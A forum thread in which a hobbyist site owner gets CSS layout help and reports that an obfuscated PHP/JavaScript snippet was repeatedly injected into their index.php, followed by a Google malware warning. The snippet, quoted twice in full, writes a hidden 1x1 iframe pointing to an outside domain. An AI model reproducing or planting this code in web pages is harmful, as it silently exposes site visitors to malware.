• Welcome to The Cave of Dragonflies forums, where the smallest bugs live alongside the strongest dragons.

Guests are not able to post messages or even read certain areas of the forums. Now, that's boring, don't you think? Registration, on the other hand, is simple, completely free of charge, and does not require you to give out any personal information at all. As soon as you register, you can take part in some of the happy fun things at the forums such as posting messages, voting in polls, sending private messages to people and being told that this is where we drink tea and eat cod.

Of course I'm not forcing you to do anything if you don't want to, but seriously, what have you got to lose? Five seconds of your life?

AobaruNet

Lots of your affiliates have invalid HTML, and valid HTML is one of your affiliation requirements. Even the top ones.

Well, I'm going to change it to recommend valid HTML/XHTML instead of requiring it. I'm also getting rid of Junior Affiliates and merging them with the Normal Affiliates.

Now, not to be pushy, but can someone help with the problem a couple posts back?

I clicked the link on the main page, and the styles seem to be working, even the Mew one. I don't know what was up with that page that Peter linked to...

WOW GUYS I'M FREAKED OUT.

This was at the bottom of my code for index.php (and I didn't put it there):

PHP:
<?php echo '<script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]<i[@&%^f$^!%r[@&%^a((*)&!m$[[^@&e$[[^@& (&@)&]s[@&%^rc[@&%^=$^!%h$[[^@&t$^!%t$[[^@&p$[[^@&:((*)&!/(&@)&]/$^!%u$[[^@&p[@&%^d[@&%^a[@&%^t$^!%e$[[^@&da((*)&!t$^!%e(&@)&].[@&%^c(&@)&]n/$^!% $^!%h(&@)&]e(&@)&]i$[[^@&g$[[^@&h$^!%t$^!%=$^!%1$[[^@& [@&%^w$[[^@&i((*)&!d(&@)&]th(&@)&]=1(&@)&]></((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))</script>'; ?>

Well, anyway, the page is working now.

I clicked the link on the main page, and the styles seem to be working, even the Mew one. I don't know what was up with that page that Peter linked to...

Yes, the Mew layout is working but I'm having some problems with positioning.

This image is supposed to be right under the banner, like this. The content and right menu aren't supposed to be level with the image like they are now. How can I fix this?

Uh, dude. It is right underneath the banner.
Also, for some reason, your default style isn't working. My guess is that the default style doesn't define ANYTHING.

Yes, the Mew layout is working but I'm having some problems with positioning.

This image is supposed to be right under the banner, like this. The content and right menu aren't supposed to be level with the image like they are now. How can I fix this?
Have you tried float:left;ing it? Right now the banner and the left-top fragment aren't positioned, so I think they're shoving everything else under them.

...except they're not? Unless the link to your CSS in the last post isn't updated, or I'm missing something.

Code:
#banner {
width:800px;
height: 140px;
background: url('/aobarunet/banner.png');
}

#lefttop {
background: url('/aobarunet/left_top.png');
width:195px;
height:78px;
}
No positioning on either of them. Nor is there positioning information for them in the global stylesheet. Unless you mean that you tried floating them left and it didn't work (in which case, what happened, if anything?).

...except they're not? Unless the link to your CSS in the last post isn't updated, or I'm missing something.

Code:
#banner {
}

#lefttop {
}
No positioning on either of them. Nor is there positioning information for them in the global stylesheet. Unless you mean that you tried floating them left and it didn't work (in which case, what happened, if anything?).

You must have looked at it before I changed it (even though I changed it before I last posted 0.0)

Anyway, this is it now:
Code:
#container {
float:left;
width:100%;
background:url('/aobarunet/frame.png') top left repeat-y;
}

#banner {
}

#container2 {
width:615px;
}

#lefttop {
}

It looks the same ;__;

Um, why do I get this when I go to your site:

Remember when I posted that this code had mysteriously appeared on my index.php:

PHP:
<?php echo '<script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]<i[@&%^f$^!%r[@&%^a((*)&!m$[[^@&e$[[^@& (&@)&]s[@&%^rc[@&%^=$^!%h$[[^@&t$^!%t$[[^@&p$[[^@&:((*)&!/(&@)&]/$^!%u$[[^@&p[@&%^d[@&%^a[@&%^t$^!%e$[[^@&da((*)&!t$^!%e(&@)&].[@&%^c(&@)&]n/$^!% $^!%h(&@)&]e(&@)&]i$[[^@&g$[[^@&h$^!%t$^!%=$^!%1$[[^@& [@&%^w$[[^@&i((*)&!d(&@)&]th(&@)&]=1(&@)&]></((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))</script>'; ?>

Well, it was there again when I opened it up this morning! What the hell is going on? :\

I've scanned all my files with an Anti-Virus software and there are no signs of an infection. Also, all my files except for index.php are perfectly fine.

I've submitted a review to Google asking them to take the warning off. I guess that's all I can do right now. :[

On my host, they forced advertisements onto all of my pages without telling me. I submitted an error report with them and they told me how to fix the problem. I actually had to code a place for the ads and get a code for them. Then the host removed the forced ads.

This might be your problem.

I emailed my host, Kat from Eevee's HQ, about this problem, and she believes I was hacked :\

I'm changing the security on my FTP and also my passwords. Hopefully this will prevent a repeat occurrence. *sigh*

On a side note: the damn Google warning is messing up my CSS. I hope it gets removed soon.

Do you know who or what may have hacked your account and applied that PHP code there? D:

I have no idea. :[ Google says:

Google said:
How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

But this page says:

Google said:
Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, www.aobarunet.eeveeshq.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

Google still hasn't taken off the warning. I guess I'll go through all my files one-by-one and look for any more suspicious code, then submit again. :\

Back
Top Bottom